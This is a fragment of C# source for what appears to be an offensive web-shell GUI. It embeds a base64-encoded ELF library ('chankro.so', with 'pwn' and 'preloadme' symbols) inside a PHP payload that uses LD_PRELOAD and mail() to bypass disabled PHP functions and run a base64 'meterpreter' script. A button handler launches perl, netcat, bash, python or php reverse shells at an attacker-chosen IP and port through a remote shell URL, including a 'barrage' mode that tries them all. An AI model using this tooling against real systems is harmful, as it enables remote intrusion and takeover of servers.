AqD7AhQUf/Sg8QQi138ycOJ9o28JwAAAABVieVT6Ff///+Bw9cZAACD7ASAuzQAAAAAdSeLg/D///+FwHQRg+wM/7MwAAAA6B3///+DxBDoNf///8aDNAAAAAGLXfzJw4n2jbwnAAAAAOg3AAAAgcKLGQAAjYII////iwiFyXUJ6UT///+NdCYAi5L4////hdJ07VWJ5YPsFFD/0oPEEMnpJP///4sUJMNVieVTg+wE6MT+//+Bw0QZAACD7AyNg4zn//9Q6E/+//+DxBCD7Aho/wEAAFDofv7//4PEEIPsDI2DjOf//1DoLP7//4PEEIPsDFDoMP7//4PEEJCLXfzJw1WJ5VOD7AToa/7//4HD6xgAAIPsCGoBagHoyf3//4PEEOgh/v//hcB0CoPsDGoA6AP+//+Qi138ycNVieVTg+wE6DH+//+Bw7EYAACD7AyNg5Tn//9Q6Hz9//+DxBDolP3//+if/f//kItd/MnDAFOD7Ajo//3//4HDfxgAAIPECFvDQ0hBTktSTwBMRF9QUkVMT0FEAAABGwM7MAAAAAUAAAAw/f//TAAAAND9//9wAAAAEP///4QAAABp////qAAAAKP////MAAAAFAAAAAAAAAABelIAAXwIARsMBASIAQAAIAAAABwAAADc/P//oAAAAAAOCEYODEoPC3QEeAA/GjsqMiQiEAAAAEAAAABY/f//EAAAAAAAAAAgAAAAVAAAAIT+//9ZAAAAAEEOCIUCQg0FRIMDAlHFwwwEBAAgAAAAeAAAALn+//86AAAAAEEOCIUCQg0FRIMDcsXDDAQEAAAgAAAAnAAAAM/+//80AAAAAEEOCIUCQg0FRIMDbMXDDAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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ABDBwAANAAAABIADAADAgAAOCAAAAAAAAAQABgACAIAADQgAAAAAAAAEAAYABQCAAAAAAAAAAAAABIAAAAkAgAAAAAAAAAAAAAgAAAAOAIAAAAAAAAAAAAAIAAAAFICAAAAAAAAAAAAABIAAABjAgAArAQAAAAAAAASAAkAAGNydHN0dWZmLmMAX19KQ1JfTElTVF9fAGRlcmVnaXN0ZXJfdG1fY2xvbmVzAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABjb21wbGV0ZWQuNjU4NwBfX2RvX2dsb2JhbF9kdG9yc19hdXhfZmluaV9hcnJheV9lbnRyeQBmcmFtZV9kdW1teQBfX2ZyYW1lX2R1bW15X2luaXRfYXJyYXlfZW50cnkAaG9vay5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX194ODYuZ2V0X3BjX3RodW5rLmJ4AF9feDg2LmdldF9wY190aHVuay5keABfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwB1bnNldGVudkBAR0xJQkNfMi4wAF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBfZWRhdGEAc2lnbmFsQEBHTElCQ18yLjAAZGFlbW9uaXplAF9maW5pAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjEuMwBwd24AZ2V0ZW52QEBHTElCQ18yLjAAc3lzdGVtQEBHTElCQ18yLjAAX19nbW9uX3N0YXJ0X18AZXhpdEBAR0xJQkNfMi4wAHByZWxvYWRtZQBfZW5kAF9fYnNzX3N0YXJ0AGZvcmtAQEdMSUJDXzIuMABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAY2htb2RAQEdMSUJDXzIuMABfaW5pdAAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuamNyAC5keW5hbWljAC5nb3QucGx0AC5kYXRhAC5ic3MALmNvbW1lbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAABQBAAAUAQAAJAAAAAAAAAAAAAAABAAAAAAAAAAuAAAA9v//bwIAAAA4AQAAOAEAAEQAAAADAAAAAAAAAAQAAAAEAAAAOAAAAAsAAAACAAAAfAEAAHwBAABQAQAABAAAAAEAAAAEAAAAEAAAAEAAAAADAAAAAgAAAMwCAADMAgAA8wAAAAAAAAAAAAAAAQAAAAAAAABIAAAA////bwIAAADAAwAAwAMAACoAAAADAAAAAAAAAAIAAAACAAAAVQAAAP7//28CAAAA7AMAAOwDAAAwAAAABAAAAAEAAAAEAAAAAAAAAGQAAAAJAAAAAgAAABwEAAAcBAAASAAAAAMAAAAAAAAABAAAAAgAAABtAAAACQAAAEIAAABkBAAAZAQAAEgAAAADAAAAFgAAAAQAAAAIAAAAdgAAAAEAAAAGAAAArAQAAKwEAAAjAAAAAAAAAAAAAAAEAAAAAAAAAHEAAAABAAAABgAAANAEAADQBAAAoAAAAAAAAAAAAAAAEAAAAAQAAAB8AAAAAQAAAAYAAABwBQAAcAUAABAAAAAAAAAAAAAAAAgAAAAAAAAAhQAAAAEAAAAGAAAAgAUAAIAFAAD3AQAAAAAAAAAAAAAQAAAAAAAAAIsAAAABAAAABgAAAHgHAAB4BwAAFAAAAAAAAAAAAAAABAAAAAAAAACRAAAAAQAAAAIAAACMBwAAjAcAABMAAAAAAAAAAAAAAAEAAAAAAAAAmQAAAAEAAAACAAAAoAcAAKAHAAA0AAAAAAAAAAAAAAAEAAAAAAAAAKcAAAABAAAAAgAAANQHAADUBwAAwAAAAAAAAAAAAAAABAAAAAAAAACxAAAADgAAAAMAAAD8HgAA/A4AAAgAAAAAAAAAAAAAAAQAAAAEAAAAvQAAAA8AAAADAAAABB8AAAQPAAAEAAAAAAAAAAAAAAAEAAAABAAAAMkAAAABAAAAAwAAAAgfAAAIDwAABAAAAAAAAAAAAAAABAAAAAAAAADOAAAABgAAAAMAAAAMHwAADA8AAOAAAAAEAAAAAAAAAAQAAAAIAAAAgAAAAAEAAAADAAAA7B8AAOwPAAAUAAAAAAAAAAAAAAAEAAAABAAAANcAAAABAAAAAwAAAAAgAAAAEAAAMAAAAAAAAAAAAAAABAAAAAQAAADgAAAAAQAAAAMAAAAwIAAAMBAAAAQAAAAAAAAAAAAAAAQAAAAAAAAA5gAAAAgAAAADAAAANCAAADQQAAAEAAAAAAAAAAAAAAABAAAAAAAAAOsAAAABAAAAMAAAAAAAAAA0EAAALQAAAAAAAAAAAAAAAQAAAAEAAAABAAAAAgAAAAAAAAAAAAAAZBAAADAEAAAbAAAALwAAAAQAAAAQAAAACQAAAAMAAAAAAAAAAAAAAJQUAABpAgAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAAD9FgAA9AAAAAAAAAAAAAAAAQAAAAAAAAA=';
            $meterpreter = '" + b64ShellCode + @"';
            file_put_contents('./chankro.so', base64_decode($hook32));
            file_put_contents('./acpid.socket', ""#!/bin/bash\n"".base64_decode($meterpreter));
            putenv('CHANKRO=./acpid.socket');
            putenv('LD_PRELOAD=./chankro.so');
            mail('a','a','a','a');
            sleep(2);
            unlink('chankro.so');
            unlink('acpid.socket');";

            return chankro32;
        }

        /// <summary>
        /// Normal request routine for popping reverse shell
        /// </summary>
        /// <param name="shellCode"></param>
        private async void PopReverseShell(string shellCode)
        {
            string phpCode = PhpHelper.ExecuteSystemCode(shellCode, false);

            ResponseObject response = await Task.Run(() => WebHelper.ExecuteRemotePHP(ShellUrl, phpCode));

            if (string.IsNullOrEmpty(response.Result) == false) {
                string result = response.Result;
            }
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="phpCode"></param>
        private async void PopChankroShell(string phpCode)
        {
            await Task.Run(() => WebHelper.ExecuteRemotePHP(ShellUrl, phpCode));
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnPopShell_Click(object sender, EventArgs e)
        {
            string shellCode = string.Empty;
            string ipv4 = Helper.MinifyCode(textBoxIP.Text);

            //todo gui things, ipv4 & port validation
            if (string.IsNullOrEmpty(ipv4)) {
                return;
            }

            string port = textBoxPort.Text;

            if (string.IsNullOrEmpty(port)) {
                return;
            }

            switch (comboBoxMethod.Text) {
                case "perl":
                    shellCode = PerlShell(ipv4, port);
                    break;
                case "netcat":
                    shellCode = NetCatShell(ipv4, port);
                    break;
                case "netcat with pipe":
                    shellCode = NetCatPipeShell(ipv4, port);
                    break;
                case "php":
                    shellCode = PhpShell(ipv4, port);
                    break;
                case "bash":
                    shellCode = BashShell(ipv4, port);
                    break;
                case "python":
                    shellCode = PythonShell(ipv4, port);
                    break;
                case "barrage":
                    if (checkBoxDisabledFunctionsBypass.Checked) {
                        //todo logging
                        MessageBox.Show("Sorry barrage is not supported with chankro...", "Ooops!!");
                        return;
                    }

                    //todo would be cool to detect if the shell pop'd and stop further shell poping attempts
                    shellCode = PerlShell(ipv4, port);
                    PopReverseShell(shellCode);

                    shellCode = NetCatShell(ipv4, port);
                    PopReverseShell(shellCode);

                    shellCode = NetCatPipeShell(ipv4, port);
                    PopReverseShell(shellCode);

                    shellCode = PhpShell(ipv4, port);
                    PopReverseShell(shellCode);

                    shellCode = BashShell(ipv4, port);
                    PopReverseShell(shellCode);

                    shellCode = PythonShell(ipv4, port);
                    PopReverseShell(shellCode);
                return;
                default:
                    //todo logging lvl 3
                    MessageBox.Show("Unknwon shell vector selection", "GUI Error");
                break;
            }

            if (checkBoxDisabledFunctionsBypass.Checked) {
                shellCode = Helper.EncodeBase64ToString(shellCode);
                if (comboBoxArch.Text == "x86") {
                    PopChankroShell(Chankro32BitShell(shellCode));
                } else if(comboBoxArch.Text == "x64") {
                    PopChankroShell(Chankro64BitShell(shellCode));
                } else {
                    MessageBox.Show("Failed to find correct architecture comboBox selection", "Ooops!!");
                }
            } else {
                PopReverseShell(shellCode);
            }
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void buttonGetIpv4_Click(object sender, EventArgs e)
        {
            var task = WebHelper.GetRequest("http://ipv4bot.whatismyipaddress.com/");

            //Todo tie this timeout in as a configureable option
            if (await Task.WhenAny(task, Task.Delay(10000)) == task) {
                if (string.IsNullOrEmpty(task.Result)) {
                    MessageBox.Show("Unable to ubtain IP Address", "Connection Failed");
                } else {
                    textBoxIP.Text = task.Result;
                }
            }
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private void textBoxPort_KeyPress(object sender, KeyPressEventArgs e)
        {
            if (!char.IsControl(e.KeyChar) && !char.IsDigit(e.KeyChar)) {
                e.Handled = true;
            }
        }

        /// <summary>
        /// 
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private void checkBoxDisabledFunctionsBypass_CheckedChanged(object sender, EventArgs e)
        {
            if (checkBoxDisabledFunctionsBypass.Checked) {
                MessageBox.Show("You should only use this if all process execution methods are disabled, it can could potentially cause a fork bomb or other undesirable results.\r\r" +
                                "Furthermore the web_root must be writeable, and you may need to perform cleanup in that directory", "Warning!!!");

                comboBoxArch.Enabled = true;
            } else {
                comboBoxArch.Enabled = false;
            }
        }
    }
}

